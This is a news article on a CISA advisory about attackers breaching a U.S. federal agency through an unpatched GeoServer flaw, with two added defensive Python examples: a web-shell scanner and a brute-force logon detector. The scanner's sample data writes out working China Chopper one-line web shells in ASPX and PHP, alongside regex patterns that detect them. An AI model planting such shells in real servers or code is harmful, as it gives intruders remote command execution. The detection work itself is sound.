
Hackers Breach Federal Agency via GeoServer Flaw, CISA Warns

▼ Summary

– Attackers breached a U.S. federal agency by exploiting an unpatched, critical GeoServer vulnerability (CVE-2024-36401) to gain initial access.
– After compromising the GeoServer, the threat actors moved laterally through the network, breaching a web server and an SQL server.
– The attackers deployed tools like the China Chopper web shell for remote access, persistence, and privilege escalation, primarily using brute force techniques for lateral movement.
– The intrusion went undetected for three weeks until an Endpoint Detection and Response (EDR) tool alerted the agency’s Security Operations Center (SOC).
– CISA advises organizations to promptly patch critical vulnerabilities, continuously monitor EDR alerts, and strengthen their incident response plans.

A critical vulnerability in GeoServer software was recently exploited to breach a U.S. federal agency’s network, according to a warning from the Cybersecurity and Infrastructure Security Agency (CISA). The incident, which occurred last year, began when attackers compromised an unpatched GeoServer instance belonging to an unnamed federal civilian executive branch agency. This security flaw, identified as CVE-2024-36401, is a severe remote code execution vulnerability for which a patch was released on June 18, 2024.

CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog about a month after the patch became available. This action followed the public release of proof-of-concept exploits by multiple security researchers, which demonstrated how to achieve code execution on vulnerable servers. Although CISA did not detail the exact methods used in real-world attacks, independent threat monitoring services observed malicious activity beginning in early July. One open-source intelligence search engine reported that more than 16,000 GeoServer instances were exposed online at the time.

The attack on the federal agency unfolded in distinct stages. Threat actors first gained access to the agency’s GeoServer server just two days after initial attacks were detected globally. They compromised a second server approximately two weeks later. From this initial foothold, the attackers moved laterally across the network, successfully breaching both a web server and an SQL server. On these compromised systems, they deployed various malicious tools, including the well-known China Chopper web shell, alongside other scripts designed to provide remote access, ensure persistence, execute commands, and escalate privileges.
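The EDR alert that eventually exposed this intrusion fired on a suspicious file, and one-line web shells of the China Chopper family are exactly the kind of file a defender can also hunt for directly. The following scanner is an added example written for this article, not code from CISA, the agency involved, or the GeoServer project; the file contents it scans are constructed samples of the classic ASPX and PHP China Chopper payloads plus a generic JSP command-execution idiom, and the rule names and the `SAMPLES` layout are assumptions made for the example.

```python
"""Scan a web root for one-line web shells of the China Chopper family.
Added illustrative detection code; the file contents below are
constructed samples, not artifacts from the incident in the article."""
import hashlib
import os
import re

# Signatures for well-known one-line shells: (rule name, regex).
# The ASPX and PHP forms are the classic China Chopper payloads; the JSP rule
# catches the common Runtime.exec(request.getParameter(...)) idiom.
SHELL_RULES = [
    ("china_chopper_aspx",
     re.compile(r'eval\s*\(\s*Request\.Item\[[^\]]+\]\s*,\s*"unsafe"', re.I)),
    ("china_chopper_php",
     re.compile(r'@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\[', re.I)),
    ("jsp_runtime_exec",
     re.compile(r'Runtime\.getRuntime\(\)\.exec\(\s*request\.getParameter', re.I)),
]

# Only server-executable file types are worth scanning for a web shell.
WEB_EXTENSIONS = {".aspx", ".asp", ".ashx", ".php", ".jsp", ".jspx"}


def scan_content(content):
    """Return the names of every rule that matches the given file content."""
    return [name for name, rx in SHELL_RULES if rx.search(content)]


def scan_tree(root):
    """Walk `root` and return {relative_path: {"rules": [...], "sha256": ...}}
    for every web-executable file that matches at least one rule."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    content = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            rules = scan_content(content)
            if rules:
                with open(path, "rb") as fh:
                    digest = hashlib.sha256(fh.read()).hexdigest()
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits[rel] = {"rules": rules, "sha256": digest}
    return hits


# Constructed samples (hypothetical paths and contents, not real artifacts).
SAMPLES = {
    "upload/x.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "img/cache.php": "<?php @eval($_POST['p']); ?>",
    "index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",  # benign
}


def write_samples(root):
    """Materialise the constructed samples under `root`."""
    for rel, body in SAMPLES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def scan_samples():
    """Write the samples to a temporary web root and scan it."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        write_samples(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for path, info in scan_samples().items():
        print(f"{path}: {info['rules']} sha256={info['sha256'][:16]}...")
```

The SHA-256 of each hit is recorded so the file can be compared against EDR telemetry and threat-intelligence feeds before it is removed; in a real sweep the scan would run against the live web root of each server in the affected segment, not a temporary directory.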

Once inside the network, the intruders relied heavily on brute force attacks against account passwords, a technique that facilitated their lateral movement and their attempts to gain higher-level access. They also obtained access to service accounts by exploiting the services those accounts ran under. The attackers’ presence went unnoticed for three weeks. Detection finally occurred when the agency’s Endpoint Detection and Response (EDR) solution alerted its Security Operations Center (SOC) to a suspicious file on the SQL Server on July 31, 2024.
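Brute force lateral movement of the kind described above leaves a loud trail in authentication logs: a burst of failed logons from one source against one host, followed by a success. The detector below is an added example for this article, not code from CISA or the agency; it runs over a constructed, simplified log format (timestamp, Windows event ID 4625 for failed logon or 4624 for success, source address, account, target host), and the thresholds and the `SAMPLE_EVENTS` lines are assumptions made for the example.

```python
"""Flag brute-force logon bursts, and any success that follows them, in
Windows Security-style event lines.  Added illustrative detection logic;
the log format and the events below are constructed for this example and
are not from CISA's advisory or any real agency system."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 4625 = failed logon, 4624 = successful logon.
SAMPLE_EVENTS = """\
2024-07-20T02:14:01Z 4625 src=10.20.30.41 user=svc_backup host=SQL01
2024-07-20T02:14:03Z 4625 src=10.20.30.41 user=svc_backup host=SQL01
2024-07-20T02:14:05Z 4625 src=10.20.30.41 user=svc_backup host=SQL01
2024-07-20T02:14:06Z 4625 src=10.20.30.41 user=svc_backup host=SQL01
2024-07-20T02:14:08Z 4625 src=10.20.30.41 user=svc_backup host=SQL01
2024-07-20T02:14:09Z 4625 src=10.20.30.41 user=svc_backup host=SQL01
2024-07-20T02:16:30Z 4624 src=10.20.30.41 user=svc_backup host=SQL01
2024-07-20T09:01:00Z 4625 src=10.20.30.77 user=jdoe host=WEB01
2024-07-20T09:01:40Z 4624 src=10.20.30.77 user=jdoe host=WEB01
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<eid>\d{4}) src=(?P<src>\S+) user=(?P<user>\S+) host=(?P<host>\S+)$"
)


def parse_events(text):
    """Parse log lines into (timestamp, event_id, src, user, host) tuples,
    sorted by time; malformed lines are skipped rather than aborting."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["eid"], m["src"], m["user"], m["host"]))
    events.sort(key=lambda e: e[0])
    return events


def detect_brute_force(text, threshold=5, window=timedelta(minutes=5),
                       success_gap=timedelta(minutes=30)):
    """Return findings as dicts.  A burst is `threshold` failures from one
    (src, host) pair inside `window`; a 4624 from the same pair within
    `success_gap` of the burst is reported as a probable compromise."""
    events = parse_events(text)
    failures = defaultdict(list)  # (src, host) -> recent 4625 timestamps
    bursts = {}                   # (src, host) -> time the burst was detected
    findings = []
    for ts, eid, src, user, host in events:
        key = (src, host)
        if eid == "4625":
            recent = failures[key]
            recent.append(ts)
            while recent and ts - recent[0] > window:  # slide the window
                recent.pop(0)
            if len(recent) >= threshold and key not in bursts:
                bursts[key] = ts
                findings.append({"type": "brute_force_burst", "src": src,
                                 "host": host, "failures": len(recent),
                                 "at": ts.isoformat()})
        elif eid == "4624" and key in bursts:
            if ts - bursts[key] <= success_gap:
                findings.append({"type": "success_after_brute_force",
                                 "src": src, "host": host, "user": user,
                                 "at": ts.isoformat()})
                del bursts[key]  # report each burst's success once
    return findings


if __name__ == "__main__":
    for finding in detect_brute_force(SAMPLE_EVENTS):
        print(finding)
```

The second finding type is the one that matters in an incident like this one: a single burst of failures is often a misconfigured script, but a success from the same source minutes later is the signature of a guessed password. Real Windows 4625 events also carry a logon type and a failure status code, both of which should be added to the key so that network logons (type 3) and interactive logons are not mixed.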

A series of subsequent EDR alerts related to the malicious activity prompted the SOC team to immediately isolate the affected server. An investigation was launched with direct assistance from CISA to contain the breach and assess the damage. In response to this incident, CISA is strongly urging all network defenders to prioritize patching critical vulnerabilities, especially those listed in its Known Exploited Vulnerabilities catalog. The agency also emphasizes the need for security operations centers to maintain continuous, vigilant monitoring of EDR alerts and to strengthen their overall incident response plans.

This advisory follows another recent CISA publication from July, which detailed findings from a proactive hunt operation at a separate U.S. critical infrastructure organization. While that engagement found no evidence of an active breach, it uncovered significant cybersecurity risks. These included insecurely stored credentials, local administrator passwords shared across numerous workstations, overly permissive remote access for admin accounts, inadequate logging, and weak network segmentation.

(Source: Bleeping Computer)
